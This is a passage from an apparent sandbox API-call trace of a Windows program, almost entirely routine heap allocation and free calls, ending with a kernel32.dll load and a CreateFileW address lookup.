RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0082.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0082.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb018 [0082.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0082.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0082.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0082.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0082.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0082.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0082.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0082.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0082.905] PeekMessageW (in: lpMsg=0x144e7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7b4) returned 0 [0082.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0082.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0082.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0082.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0082.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0082.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0082.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0082.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0082.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0082.906] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0082.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0082.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0082.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0082.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a90 [0082.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0082.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0082.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0082.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0082.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0082.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2ae0 [0082.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0082.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0082.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0082.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2ac0 [0082.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0082.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0082.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0082.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cadd8 [0082.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0082.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0082.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0082.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0082.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0082.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0082.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0082.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0082.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0082.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0082.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0082.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0082.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0082.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0082.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0082.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0082.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0082.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0082.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0082.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0082.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0082.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0082.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0082.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0082.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0082.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0082.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0082.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ea8 [0082.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0082.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0082.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0082.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0082.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0082.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0082.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0082.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0082.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0082.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2be0 [0082.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0082.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0082.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0082.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0082.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0082.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0082.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0082.910] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0082.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0082.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0082.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bc0 [0082.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0082.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0082.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c40 [0082.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0082.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0082.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0082.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0082.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0082.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0082.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0082.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c10 [0082.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0082.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0082.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0082.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0082.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0082.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0082.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0082.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b70 [0082.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0082.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0082.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0082.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0082.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0082.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3a8 [0082.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c20 [0082.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0082.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0082.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0082.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d20 [0082.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0082.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0082.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c50 [0082.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb438 [0082.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0082.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0082.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0082.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0082.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0082.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0082.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0082.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cd0 [0082.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0082.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0082.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb420 [0082.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2be0 [0082.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0082.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0082.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0082.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0082.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0082.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c70 [0082.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0082.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0082.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d10 [0082.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3620 [0082.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0082.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3878 [0082.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cc0 [0082.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0082.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3698 [0082.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c20 [0082.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3680 [0082.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0082.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4508 [0082.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0082.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0082.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0082.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0082.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0082.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0082.914] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0082.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3830 [0082.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cf0 [0082.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0082.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3758 [0082.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0082.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0082.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0082.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0082.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0082.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c70 [0082.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3638 [0082.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b60 [0082.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d20 [0082.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3758 [0082.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3638 | out: hHeap=0x1780000) returned 1 [0082.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0082.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0082.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c80 [0082.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36b0 [0082.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c90 [0082.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0082.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3728 [0082.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0082.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0082.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0082.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0082.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ba0 [0082.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3860 [0082.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0082.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d00 [0082.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3590 [0082.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0082.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0082.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0082.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0082.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b60 [0082.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3728 [0082.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0082.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ca0 [0082.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3590 [0082.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0082.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0082.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0082.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0082.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3788 [0082.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0082.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0082.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36b0 [0082.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0082.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0082.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0082.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0082.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3860 [0082.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0082.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0082.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3830 [0082.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0082.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0082.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0082.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b90 [0082.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3728 [0082.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0082.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c90 [0082.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3590 [0082.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0082.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0082.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0082.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0082.917] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0082.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37b8 [0082.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 [0082.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3758 [0082.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43c3758, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0082.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0082.918] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0082.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0082.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0082.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0082.918] RtlAllocateHeap (HeapHandle=0x1780000, 